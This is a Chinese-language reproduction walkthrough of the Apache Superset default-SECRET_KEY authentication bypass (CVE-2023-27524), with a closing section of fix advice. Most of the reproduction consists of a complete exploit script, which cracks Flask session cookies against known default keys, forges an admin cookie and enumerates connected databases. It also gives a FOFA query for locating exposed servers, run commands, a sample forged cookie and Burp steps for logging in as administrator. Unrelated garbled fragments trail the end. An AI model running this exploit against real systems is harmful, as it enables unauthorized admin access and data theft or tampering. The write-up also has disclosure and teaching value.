文章目錄
- ?Apache Superset 未授權訪問漏洞(CVE-2023-27524)復現
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影響版本
- 0x04 漏洞環境
- 0x05 漏洞復現
- 1.訪問漏洞環境
- 2.漏洞復現
- 0x06 修復建議
?Apache Superset 未授權訪問漏洞(CVE-2023-27524)復現
0x01 前言
免責聲明:請勿利用文章內的相關技術從事非法測試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負責,所產生的一切不良后果與文章作者無關。該文章僅供學習用途使用!!!
0x02 漏洞描述
Apache Superset是一個開源的數據可視化和數據探測平臺,它基于Python構建,使用了一些類似于Django和Flask的Python web框架。提供了一個用戶友好的界面,可以輕松地創建和共享儀表板、查詢和可視化數據,也可以集成到其他應用程序中。
由于Apache Superset存在不安全的默認配置,未根據安裝說明更改默認SECRET_KEY的系統受此漏洞影響,未經身份認證的遠程攻擊者利用此漏洞可以訪問未經授權的資源或執行惡意代碼。
0x03 影響版本
Apache Superset <= 2.0.1
0x04 漏洞環境
FOFA語法: “Apache Superset”
0x05 漏洞復現
1.訪問漏洞環境
2.漏洞復現
首先Apache Superset是基于python中的flask web框架編寫的,flask是一個python輕量級web框架,它的session存儲在客戶端的cookie字段中。為了防止session篡改,flask進行了如下的處理(代碼存放在flask模塊中sessions.py文件中):
"""The default session interface that stores sessions in signed cookies
through the :mod:`itsdangerous` module.
"""#: the salt that should be applied on top of the secret key for the
#: signing of cookie based sessions.
salt = "cookie-session"
#: the hash function to use for the signature. The default is sha1
digest_method = staticmethod(hashlib.sha1)
#: the name of the itsdangerous supported key derivation. The default
#: is hmac.
key_derivation = "hmac"
#: A python serializer for the payload. The default is a compact
#: JSON derived serializer with support for some extra Python types
#: such as datetime objects or tuples.
serializer = session_json_serializer
session_class = SecureCookieSessiondef get_signing_serializer(self, app):
if not app.secret_key:
return None
signer_kwargs = dict(
key_derivation=self.key_derivation, digest_method=self.digest_method
)
return URLSafeTimedSerializer(
app.secret_key,
salt=self.salt,
serializer=self.serializer,
signer_kwargs=signer_kwargs,
)
……
……
使用漏洞利用工具 ,下載地址:
https://github.com/horizon3ai/CVE-2023-27524
from flask_unsign import session
import requests
import urllib3
import argparse
import re
from time import sleep
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)SECRET_KEYS = [b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h', # version < 1.4.1b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET', # version >= 1.4.1b'thisISaSECRET_1234', # deployment templateb'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY', # documentationb'TEST_NON_DEV_SECRET' # docker compose
]def main():parser = argparse.ArgumentParser()parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')parser.add_argument('--validate', '-v', help='Validate login', required=False, action='store_true')parser.add_argument('--timeout', '-t', help='Time to wait before using forged session cookie, default=5s', required=False, type=int, default=5)args = parser.parse_args()try:u = args.url.rstrip('/') + '/login/'headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'}resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)if resp.status_code != 200:print(f'Error retrieving login page at {u}, status code: {resp.status_code}')returnsession_cookie = Nonefor c in resp.cookies:if c.name == 'session':session_cookie = c.valuebreakif not session_cookie:print('Error: No session cookie found')returnprint(f'Got session cookie: {session_cookie}')try:decoded = session.decode(session_cookie)print(f'Decoded session cookie: {decoded}')except:print('Error: Not a Flask session cookie')returnmatch = re.search(r'"version_string": "(.*?)"', resp.text)if match:version = match.group(1)else:version = 'Unknown'print(f'Superset Version: {version}')for i, k in enumerate(SECRET_KEYS):cracked = session.verify(session_cookie, k)if cracked:breakif not cracked:print('Failed to crack session cookie')returnprint(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')try:user_id = int(args.id)except:user_id = args.idforged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)print(f'Forged session cookie for user {user_id}: {forged_cookie}')if args.validate:validated = Falsetry:headers['Cookie'] = f'session={forged_cookie}'print(f'Sleeping {args.timeout} seconds before using forged cookie to account for time drift...')sleep(args.timeout)resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)if resp.status_code == 302:print(f'Got 302 on login, forged cookie appears to have been accepted')validated = Trueelse:print(f'Got status code {resp.status_code} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.')except Exception as e_inner:print(f'Got error {e_inner} on login instead of expected redirect 302. Forged cookie does not appear to be valid. Re-check user id.')if not validated:returnprint('Enumerating databases')for i in range(1, 101):database_url_base = args.url.rstrip('/') + '/api/v1/database'try:r = requests.get(f'{database_url_base}/{i}', headers=headers, verify=False, timeout=30, allow_redirects=False)if r.status_code == 200:result = r.json()['result'] # validate response is JSONname = result['database_name']print(f'Found database {name}')elif r.status_code == 404:print(f'Done enumerating databases')break # no more databaseselse:print(f'Unexpected error: status code={r.status_code}')breakexcept Exception as e_inner:print(f'Unexpected error: {e_inner}')breakexcept Exception as e:print(f'Unexpected error: {e}')if __name__ == '__main__':main()
PS:用法
python37 CVE-2023-27524.py -h
usage: CVE-2023-27524.py [-h] --url URL [--id ID] [--validate][--timeout TIMEOUT]optional arguments:-h, --help show this help message and exit--url URL, -u URL Base URL of Superset instance--id ID User ID to forge session cookie for, default=1--validate, -v Validate login--timeout TIMEOUT, -t TIMEOUTTime to wait before using forged session cookie,default=5s
然后執行如下命令,-u 后面跟你想要檢測的地址。
python3 CVE-2023-27524.py -u http://127.0.0.1/ --validate
攻擊者可以利用爆破出來的key偽造一個user_id值設置為1的會話cookie,以管理員身份登錄。在瀏覽器的本地存儲中設置偽造的會話 cookie 并刷新頁面允許攻擊者以管理員身份訪問應用程序。SQL Lab接口允許攻擊者對連接的數據庫運行任意SQL語句。根據數據庫用戶權限,攻擊者可以查詢、修改和刪除數據庫中的任何數據,以及在數據庫服務器上執行遠程代碼。若存在漏洞這里會爆出一個cookie值。
eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZV6v8g.KpbTtE1tzjCztMlt5PHsHYdOsU8
使用burp攔截請求包,這里是GET,也就是說不需要登錄,直接刷新獲取即可。
替換上面的cookie值(替換為漏洞利用工具爆出來的cookie值)。替換后放開數據包,成功登錄進去Apache Superset 管理后臺 ,里面可以執行一些sql語句等操作(證明其有危害即可,不要隨意執行sql語句篡改數據)
0x06 修復建議
1.臨時解決措施:
修改配置中的SECRET_KEY值,使用新的 SECRET_KEY 重新加密該信息,參考鏈接:
https://superset.apache.org/docs/installation/configuring-superset/#secret_key-rotation
2.目前廠商已發布升級補丁以修復漏洞,補丁獲取鏈接:
https://lists.apache.org/thread/n0ftx60sllf527j7g11kmt24wvof8xyk
參考鏈接
https://mp.weixin.qq.com/s/VVpurbMCYZ2gqaG-SV1Oug
https://www.cve.org/CVERecord?id=CVE-2023-27524
| 設備管理-- 端口 驅動程序 基本I/O控制 磁盤I/O)
- 類型支持 (類型修改,添加 const 或/與 volatile 限定符到給定類型,std::add_cv))
系統部署的重要性)
)
